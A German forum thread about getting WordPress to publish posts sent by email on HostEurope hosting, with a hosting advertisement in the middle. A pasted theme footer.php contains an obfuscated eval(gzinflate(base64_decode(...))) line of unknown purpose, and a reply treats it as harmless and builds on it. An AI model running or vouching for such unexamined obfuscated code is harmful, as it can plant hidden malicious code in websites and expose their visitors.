• Hallo

Ich bin gerade dabei, mir WP einzurichten und bekomme den Mailversand an WP nicht hin, d.h. wie sieht die Konfiguration für HostEurope aus.
    Habe mir Mailadresse etc. eingerichtet.
    Hosteurope gibt versch. POP3 Teile an, habe zwar schon einiges probiert, komme aber nicht weiter

Gruß
    FASSI

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• hallo jottlieb
    danke für deine antwort
    bin neu....
    ...wenn bloggen bedeutet, dass ne mail auf meiner seite als beitrag veröffentlich wird, meine ich dieses.

gruss fassi

• Lieber Fassi

wenn du dir die Anleitungen genauer durchlesen würdest, hättest du gesehen, dass du zudem die wp-mail.php aufrufen mußt !:oops:
    Script läuft tadellos.

Gruss
    FASSI

• Das funktioniert bei mir auch. Allerdings habe ich vor, aus dem Urlaub mit meinem Palm zu bloggen. Wenn ich mit seinem Webbrowser wp-mail.php aufrufe, sind die Posts danach nur Drafts (mit meinem normalen Firefox werden sie direkt veröffentlicht - oder lag das daran, dass ich als Admin eingeloggt war?).
    Wordpress.com sagt, dass man für eine automatische Browser Aktivierung folgende Zeilen in footer.php einfügen muss:

HTML
    <iframe src="http://yourblogdomain/wordpressinstalldir/wp-mail.php" name="mailiframe" width="0" height="0" frameborder="0" scrolling="no" title=""></iframe>

Meine footer.php sieht aber etwas chaotisch aus, und ich weiß nicht genau, wo ich diese Zeile (natürlich mit der richtigen Domain) einfügen muss?

PHP
    <? eval(gzinflate(base64_decode('
    bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
    SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
    WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
    6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
    pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
    QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
    lqL8oPRu6qrad7xVktML
    '))); ?>

(Das ist ein runtergeladenes Theme und ich kenne mich nicht so weit mit PHP aus, als dass ich da irgendwas erkennen könnte.)

Ich benutze zur Zeit noch Version 2.3.3. Da es morgen losgehen soll, weiß ich nicht, ob ich vorher noch auf Version 2.5 updaten werde.

EDIT: Ah. Es lag an dem HTML-Code, dass das vorhin nicht funktioniert hat. Das "wordpressinstalldir" hat das alles unbrauchbar gemacht. Habe den richtigen Pfad von wp-mail.php eingefügt und die ganze Zeile einfach unter den PHP-Code bei footer.php gesetzt.
    Jetzt sind die Beiträge ein bis Minuten als scheduled eingetragen und werden dann veröffentlicht.

Einmal editiert, zuletzt von Halefa (30. März 2008 um 14:22)

• Da gibt es auch nicht viel zu erkennen, da das ganze codiert ist.

Wenn ich mich nicht irre, kannst du den entsprechenden Code gleich nach der letzten Klammer einfügen.

Am besten eine Leerzeile der Übersicht wegen davor einfügen.

Was das Updaten angeht, kann ich dir da keine Empfehlung geben. Hängt bei jedem von verschiedenen Faktoren ab. Nicht dass du wegen einem Update Komplikationen bekommst, wegen Plugins etc. die danach nicht mehr laufen und wo die Fehlersuche seine Zeit braucht.

Ist aber auch immer ein gewisses Risiko. Wünsche dir aber schonmal einen schönen Urlaub! ;)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!